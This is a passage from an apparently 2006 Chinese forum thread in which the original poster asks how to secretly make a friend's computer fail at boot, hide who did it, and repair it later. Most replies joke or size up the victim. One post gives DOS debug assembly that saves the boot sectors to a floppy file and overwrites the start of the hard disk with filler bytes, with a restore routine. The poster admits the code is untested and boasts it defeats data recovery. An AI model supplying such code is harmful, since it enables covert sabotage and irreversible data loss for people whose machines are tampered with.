免费注册 查看新帖 |

Chinaunix

平台 论坛 博客 文库
最近访问板块 发新帖
楼主: yang19830424

请教一个卑鄙问题~ [复制链接]

论坛徽章:
2015年迎新春徽章
日期:2015-03-03 17:23:07综合交流区版块每日发帖之星
日期:2015-08-19 06:20:00综合交流区版块每日发帖之星
日期:2015-09-15 06:20:00
31 [报告]
其实,主要是看对方是什么档次的人,或者说是个什么样的人。\r\n\r\n如果那人对磁盘很熟悉,你改了引导分区他是可以看出来的。\r\n还会告诉你是 55 AA有错。\r\n\r\n如果那人是个很喜欢自己鼓捣问题的人,\r\nLZ不论怎么设,都很危险,因为那个人会一直把问题搞个水落石出的,怕他一个错误操作就把你的硬盘给废了。\r\n\r\n\r\n如果那人是个只上网QQ的人,\r\nLZ,你就给他建一个低级用户,只能用QQ就好了。因为,他不会给你带来多大的伤害。\r\n\r\n\r\n如果那人是个PLMM,\r\nLZ,请你告诉大伙她的QQ或MSN,mail也可以。\r\n你就可以落个清闲了。

论坛徽章:
32 [报告]
原帖由 plumlee 于 2006-1-4 14:01 发表\r\n其实,主要是看对方是什么档次的人,或者说是个什么样的人。\r\n\r\n如果那人对磁盘很熟悉,你改了引导分区他是可以看出来的。\r\n还会告诉你是 55 AA有错。\r\n\r\n如果那人是个很喜欢自己鼓捣问题的人,\r\nLZ不论怎么设,都 ...
\r\n说得有理。PF

论坛徽章:
33 [报告]
汇编语言可真厉害啊,估计现在精通这个的人不多了.

论坛徽章:
34 [报告]
哈哈哈,太搞笑了,......郁闷啊!

论坛徽章:
35 [报告]
原帖由 plumlee 于 2006-1-4 14:01 发表\r\n其实,主要是看对方是什么档次的人,或者说是个什么样的人。\r\n\r\n如果那人对磁盘很熟悉,你改了引导分区他是可以看出来的。\r\n还会告诉你是 55 AA有错。\r\n\r\n如果那人是个很喜欢自己鼓捣问题的人,\r\nLZ不论怎么设,都 ...
\r\n原来学好技术可以这样整人,长见识了!谢谢大家伙了!

论坛徽章:
36 [报告]
楼上的兄弟,紧后那两个字节是55AA吧,你那样会害了那个兄弟的呀!

论坛徽章:
2015年迎新春徽章
日期:2015-03-03 17:23:07综合交流区版块每日发帖之星
日期:2015-08-19 06:20:00综合交流区版块每日发帖之星
日期:2015-09-15 06:20:00
37 [报告]
原帖由 ripenabc 于 2006-1-4 22:28 发表\r\n楼上的兄弟,紧后那两个字节是55AA吧,你那样会害了那个兄弟的呀!
\r\n\r\n\r\n这么细心,你不赚大钱才怪呢!!\r\n\r\n\r\n大家都希望那个是PLMM吧~?

论坛徽章:
38 [报告]
真有意思,汇编很厉害,估计他的室友不怎么懂电脑,要不他也不会想出这个注意。如果室友是一个电脑高手,他也不会怕弄坏自己的电脑,还有可能主动拿出来分享。

论坛徽章:
39 [报告]
呵呵,再来一个\r\n
  1. \r\n备份\r\ndebug\r\n-a\r\nmov ax,240\r\nmov bx,200\r\nmov cx,1\r\nmov dx,80\r\nint 13\r\nint 3\r\n\r\n-g=100\r\n-rbx\r\n:0\r\n\r\n-rcx\r\n:8000\r\n\r\n-na:boot.dat\r\n-w200\r\n-f200 ffff f6\r\n-a100\r\nmov ax,340\r\nmov bx,200\r\nmov cx,1\r\nmov dx,80\r\nint 13\r\njmp ffff:0\r\n\r\n-g=100\r\n
复制代码
\r\n
  1. \r\n恢复\r\ndebug\r\n-na:boot.dat\r\n-l200\r\n-a100\r\nmov ax,340\r\nmov bx,200\r\nmov cx,1\r\nmov dx,80\r\nint 13\r\njmp ffff:0\r\n\r\n-g=100\r\n
复制代码
\r\n用这个方法,如果你不提供那张软盘上的 boot.dat 文件,就算你把硬盘拿到数据恢复公司,他们也很难还原 ^_^\r\nPS: 这个程序比我之前写的那个要狠的多,我只是写出来,没有测试,大家使用要小心

论坛徽章:
40 [报告]
原帖由 yang19830424 于 2006-1-1 22:56 发表\r\n我最近不想用电脑,我也不想让我的朋友用电脑,但是我很虚伪,又不想让他看出来是我做的手脚,让一开机就出问题,不能正常使用,而且过段时间我可以把它修好~怎么办?
\r\n是挺无耻的